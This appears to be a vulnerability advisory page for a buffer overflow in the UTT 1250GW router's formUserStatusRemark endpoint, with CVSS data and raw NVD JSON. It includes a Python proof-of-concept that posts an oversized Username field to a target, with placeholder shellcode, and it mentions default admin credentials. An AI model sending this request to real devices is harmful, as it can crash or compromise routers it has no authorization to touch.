Security Vulnerability Report
CVE-2025-11323 CVSS 8.8 HIGH

CVE-2025-11323

Published: 2025-10-06 06:15:36
Last Modified: 2026-01-08 16:03:32

Description

A vulnerability was found in UTT 1250GW up to v2v3.2.2-200710. It affects the strcpy call reached through /goform/formUserStatusRemark: the Username argument is copied without a length bound, so an oversized value causes a buffer overflow. The attack can be carried out remotely. The exploit has been publicly disclosed and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 1250GW <= v2v3.2.2-200710

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
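# CVE-2025-11323 - UTT 1250GW Buffer Overflow PoC
# Vulnerability: Stack-based buffer overflow via strcpy in /goform/formUserStatusRemark
# Affected: UTT 1250GW up to v2v3.2.2-200710
#
# What this listing does: it builds a fixed 1024-byte filler string and submits
# it as the "Username" form field in a single POST. The return address and the
# "shellcode" below are placeholders, so the script carries no working payload;
# it only shows the shape of the request.
#
# Detection note: the observable is a POST to /goform/formUserStatusRemark whose
# Username field is far longer than a plausible account name (1024 bytes here).
# Root-cause fix on the device side is a bounded copy with an explicit length
# check before the value reaches strcpy.

import sys

TARGET_URL = "http://{target}/goform/formUserStatusRemark"

# Kept from the original listing; neither value is referenced anywhere below.
# The advisory scores PR:L, so replacing default admin credentials and limiting
# who can reach the management interface reduces exposure.
USERNAME = "admin"
PASSWORD = "admin"

# Buffer overflow payload - oversized Username parameter
# Adjust offset based on target architecture (typically MIPS for routers)
BUFFER_SIZE = 1024
OFFSET = 256  # Offset to return address (placeholder value in this listing)

# Shellcode or ROP chain placeholder (architecture dependent)
# For demonstration purposes - actual exploit requires target-specific shellcode
shellcode = b"\x90" * 100  # NOP sled placeholder


def build_payload():
    """Build the oversized Username value for the formUserStatusRemark endpoint.

    Layout, in order: OFFSET filler bytes, a 4-byte placeholder where a return
    address would go, the placeholder ``shellcode`` bytes, then ``C`` padding up
    to BUFFER_SIZE.

    Returns:
        bytes: the assembled value; BUFFER_SIZE bytes long with the constants
        defined in this file.
    """
    junk = b"A" * OFFSET
    # Return address placeholder - needs to be adjusted for actual exploitation
    ret_address = b"\x41\x41\x41\x41"
    used = len(junk) + len(ret_address) + len(shellcode)
    padding = b"C" * (BUFFER_SIZE - used)
    return junk + ret_address + shellcode + padding


def exploit(target_ip):
    """Send one POST with the oversized Username field and print the outcome.

    Args:
        target_ip: host part substituted into TARGET_URL.

    Prints the HTTP status code on success, or the transport error if the
    request fails. Nothing is returned.
    """
    # Imported here so the module can be loaded (for example to inspect
    # build_payload) without the third-party requests package installed.
    import requests

    url = TARGET_URL.format(target=target_ip)

    # Crafted POST request with oversized Username parameter
    data = {
        "Username": build_payload().decode("latin-1"),
        "StatusRemark": "test",
    }

    try:
        # Context manager closes the session's connection pool; the original
        # listing never closed it.
        with requests.Session() as session:
            response = session.post(url, data=data, timeout=10)
    except requests.RequestException as e:
        # Only transport-level failures are expected here; anything else is a
        # programming error and should surface instead of being printed away.
        print(f"[!] Error: {e}")
    else:
        print(f"[*] Exploit sent to {target_ip}")
        print(f"[*] Response status: {response.status_code}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])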

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11323", "sourceIdentifier": "[email protected]", "published": "2025-10-06T06:15:35.783", "lastModified": "2026-01-08T16:03:32.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in UTT 1250GW up to v2v3.2.2-200710. Affected is the function strcpy of the file /goform/formUserStatusRemark. This manipulation of the argument Username causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.2-200710", "matchCriteriaId": "26129544-FEE2-4C29-8C44-4FDB97605BD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "00AFFB53-0AA8-42E1-8B2E-109D73D1B061"}]}]}], "references": [{"url": "https://github.com/DavCloudz/cve/issues/3", "source": "[email protected]", 
"tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327206", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327206", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664524", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}